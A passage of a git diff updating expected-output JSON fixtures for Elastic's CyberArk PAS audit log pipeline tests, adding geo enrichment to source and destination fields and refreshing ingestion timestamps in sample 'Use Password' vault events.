Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -595,10 +640,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -670,7 +724,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-12-09T13:36:52.374522Z", + "ingested": "2021-12-14T14:42:18.814511423Z", "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -694,17 +748,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -772,7 +844,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374527900Z", + "ingested": "2021-12-14T14:42:18.814511876Z", "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -797,17 +869,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -873,7 +963,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374533800Z", + "ingested": "2021-12-14T14:42:18.814512278Z", "original": "\u003c5\u003e1 2021-03-15T10:31:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:54\",\"IsoTimestamp\":\"2021-03-15T10:31:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -898,17 +988,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -979,7 +1087,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374538300Z", + "ingested": "2021-12-14T14:42:18.814512667Z", "original": "\u003c5\u003e1 2021-03-15T14:08:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:26\",\"IsoTimestamp\":\"2021-03-15T14:08:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", @@ -1004,17 +1112,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1085,7 +1211,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374543300Z", + "ingested": "2021-12-14T14:42:18.814513065Z", "original": "\u003c5\u003e1 2021-03-16T10:04:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:49\",\"IsoTimestamp\":\"2021-03-16T10:04:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "308", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json index c90ee6bc199..bb268d66161 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-309-undefined-user-logon.log-expected.json @@ -58,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:53.859779600Z", + "ingested": "2021-12-14T14:42:20.541744956Z", "original": "\u003c7\u003e1 2021-03-08T18:31:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:31:52\",\"IsoTimestamp\":\"2021-03-08T18:31:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"adriansr\",\"Action\":\"Undefined User 